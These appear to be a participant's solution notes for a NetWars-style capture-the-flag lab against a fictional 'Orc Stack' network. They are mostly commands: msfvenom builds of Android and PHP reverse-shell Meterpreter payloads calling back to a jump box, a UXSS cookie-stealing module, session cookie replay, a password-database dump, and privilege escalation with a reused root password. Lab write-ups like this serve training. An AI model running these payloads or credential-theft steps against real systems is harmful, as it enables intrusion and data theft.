- 10.2.2.2
- port 52080
- 10.2.2.2
- ssh -i ~/Downloads/netwars.priv -R 52080:localhost:52080 lurkers@netwars-ng.counterhack.com
- alias jumpbox='ssh -i ~/netwars.priv aoluser927@netwars-ng.counterhack.com -p 62201'
- alias proxy='ssh -i ~/netwars.priv aoluser927@netwars-ng.counterhack.com -p 62201 -D 8080 -N'
- level 3
- ---------------------------
- Question 1
- ---------------------------
- Register for an account from www.orcstack.com. What is the User Agent (entire line, beginning with "User-Agent: ") of the Android device that connects using the "Deploy URL" page?
- Target: android-web.orcstack.com
- In order to see the HTTP traffic of the Android device, you need either a Man-in-the-Middle position, access to the HTTP client, or to be the destination. Of these three options, as of now you only have access to the last option. Be sure to form the URL using the IP address of the SSH jump box you're currently connected to.
- The HTTP protocol specifies that the HTTP client sends the request (including its User Agent) upon making a TCP connection. You need to set up a TCP listener on a high unused port* of the SSH jump box and create a URL to the IP and port of your TCP listener. * You need to use a high port because you're not root (which is required to listen on ports below 1024), and because your SSH jump box is shared with other people you may need to choose a different port if the one you chose is already in use.
- ---------------------------
- Solution:
- fire off a listener on your jump box.
- nc -lvp 12345
- Submit a link to the website:
- http://10.2.2.2
- User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VMware Virtual Platform Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
- ---------------------------
- Question 2
- ---------------------------
- What is the flag located at /data/data/flag.txt?
- Target: android-apk.orcstack.com
- In the android-web questions, you entered a URL that an Android device would browse to using a mobile web browser. In this question, you'll enter a URL to an APK file that a different Android device will install and run. Using that Android program, you'll need to gain some kind of shell access, elevate your privileges, and read /data/data/flag.txt on the Android device itself. You may have used Metasploit and msfvenom to create EXE files that "phone home" with Meterpreter when run on Windows targets, or PHP files that do the same when interpreted on PHP servers. Similarly, msfvenom can create APK files that have an Android Meterpreter on them.
- ---------------------------
- Solution:
- msfvenom -p android/meterpreter/reverse_tcp LHOST=10.2.2.2 LPORT=52080 R > boom.apk
- http://10.2.2.2/~lurkers/boom.apk
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set lhost 0.0.0.0
- set lport 52080
- exploit -j
- adb root
- cat /data/data/flag.txt
- e2415cb7f63df0c9de23362326ad3c37a9adfc96
- ---------------------------
- Question 3
- ---------------------------
- A common password management application is installed on this Android device. Recover a flag stored in plain text inside a database used by this application.
- Target: android-apk.orcstack.com
- You'll need to have already answered the previous question to have the necessary access to the Android device to answer this question. First, find the correct application folder under /data/data. Then, transfer the entire folder and its contents using tar and netcat back to your home folder on the SSH jump box. Finally, examine the database inside that folder carefully.
- ---------------------------
- Solution:
- cd /data/data/com.easylogics.safe.keeper.password.secure/databases/
- sqlite3 SafeKeeper
- .dump
- cedf6dc6b8893245ac066589860274fe80e6370f
- ---------------------------
- Question 4
- ---------------------------
- Using the credentials gathered in answering another question, log in to www.orcstack.com and access the Dashboard to find an unpublished page containing a flag.
- Target: www.orcstack.com
- ---------------------------
- Solution:
- http://www.orcstack.com/Admin
- administrator
- Uruk-Hai
- 80b4a4e3cbc8827b579b9873c5efd8d6bd7c977e
- ---------------------------
- Question 5
- ---------------------------
- Using the credentials gathered in answering another question, log in to www.orcstack.com and find a SHA1 hash used as a key to send commands to the development server over HTTP.
- Target: www.orcstack.com
- This question requires thorough pillaging of information under the Dashboard of the web server on www.orcstack.com.
- How do the "Deploy URL" and "Deploy APK" pages work?
- ---------------------------
- Solution:
- look in workflows tabs after logging in
- type=apk
- url={Content.Fields.AndroidAPK.URL}
- name={Content.Fields.AndroidAPK.ApplicationName}
- key=5c9b478a5576dbf8537adfc9ebf075c613ce022e
- ---------------------------
- Question 6
- ---------------------------
- Exploit a vulnerability in the Android version used for the "Deploy URL" capability of www.orcstack.com to gain access to the web cookies for http://blog.orcstack.com/. Use those cookies to gain access to a flag located in a non-Published page.
- Target: blog.orcstack.com
- Unless there's a Universal Cross-Site Scripting flaw, normally a web browser accessing (for example) http://google.com/ would never reveal cookies for a separate domain such as http://bing.com/. What Android version is being used by this device?
- msf > info auxiliary/gather/android_stock_browser_uxss
- The above module is effective against this Android device. Use the msfconsole utility to select this module and then use the "Deploy URL" capability of www.orcstack.com to gather the cookies for http://blog.orcstack.com/. Once you've done this, add the same cookies to your local browser, configure your local browser to use an SSH proxy so it can connect to the Orc Stack DMZ, then browse to http://blog.orcstack.com.
- ---------------------------
- Solution:
- use auxiliary/gather/android_stock_browser_uxss
- set SRVPORT 50790
- set TARGET_URLS http://blog.orcstack.com
- set ssl true
- edit cookie:
- name: SESSd2caba14ddc97ae8122a3d641304185c
- content: b2MREdZCPAoa9bvseV3QWCfqlgyDTOOW-iUXwR6rvIA
- 669edf6917c00d6c298676be757fef05634c614b
- ---------------------------
- Question 7
- ---------------------------
- Use an authenticated administrative web session on http://blog.orcstack.com/ to gain shell access as a limited user, then submit the contents of /flag.txt.
- Target: blog.orcstack.com
- ---------------------------
- Solution:
- msfvenom -p php/meterpreter_reverse_tcp LHOST=10.2.2.2 LPORT=21455 -f raw > shell.php
- use multi/handler
- set payload php/meterpreter_reverse_tcp
- set lhost 0.0.0.0
- set lport 21455
- run -j
- cat /flag.txt
- 4c9ef22b86ca78e8d265e007128b449f4a9ef68c
- ---------------------------
- Question 8
- ---------------------------
- Gain root privileges on blog.orcstack.com and submit the contents of /root/flag.txt.
- Target: blog.orcstack.com
- ---------------------------
- Solution:
- cat /usr/local/bin/mysql-connect.sh
- mysql --column-names --compress --host=localhost --wait -u root --password="DwarfTosser"
- mysql --host=localhost -u root --password="DwarfTosser"
- /usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
- su
- DwarfTosser
- cat /root/flag.txt
- a74687bbf8d6d21d555680bb98b6e1f9bf498d58
- ---------------------------
- Question 9-10?
- ---------------------------
- Using information found in answering another question, find the credentials to a service on www.orcstack.com, then submit the flag found inside.
- Target: www.orcstack.com
- ---------------------------
- Solution:
- 67836526fe7fcce735af56939378d7b1fd7e2f38
- System Login:
- psexec to www with
- Username: Administrator
- Password: Magical_Unicorns
- 67836526fe7fcce735af56939378d7b1fd7e2f38
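
Question 1's hint notes that an HTTP client sends its request, User-Agent included, as soon as the TCP connection is made. The following is an added example, not part of the original paste: a Python equivalent of the `nc -lvp 12345` listener that reads the request head and returns the complete User-Agent line. The function names are hypothetical; port 12345 is the one used in the solution.

```python
# Added example: helper names are hypothetical, not from the original notes.
import socket

def read_request_head(conn, limit=8192):
    """Read from a connected socket until the blank line that ends the HTTP headers."""
    data = b""
    while b"\r\n\r\n" not in data and len(data) < limit:
        chunk = conn.recv(1024)
        if not chunk:                      # client closed before finishing the headers
            break
        data += chunk
    return data

def user_agent_line(head):
    """Return the full 'User-Agent: ...' header line, or None if the client sent none."""
    for raw in head.split(b"\r\n")[1:]:    # [1:] skips the request line
        if not raw:                        # blank line: headers are over, body follows
            break
        name, _, _ = raw.partition(b":")
        if name.strip().lower() == b"user-agent":   # header names are case-insensitive
            return raw.decode("latin-1")
    return None

def capture_once(port, host="0.0.0.0"):
    """Accept one connection on an unprivileged port and report what the client sent."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))             # OSError here means the port is in use: pick another
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            head = read_request_head(conn)
            # Answer so the client does not hang waiting for a response.
            conn.sendall(b"HTTP/1.1 204 No Content\r\nConnection: close\r\n\r\n")
    return peer[0], user_agent_line(head)

if __name__ == "__main__":
    # Blocks until one client connects, then prints (client_ip, user_agent_line).
    print(capture_once(12345))
```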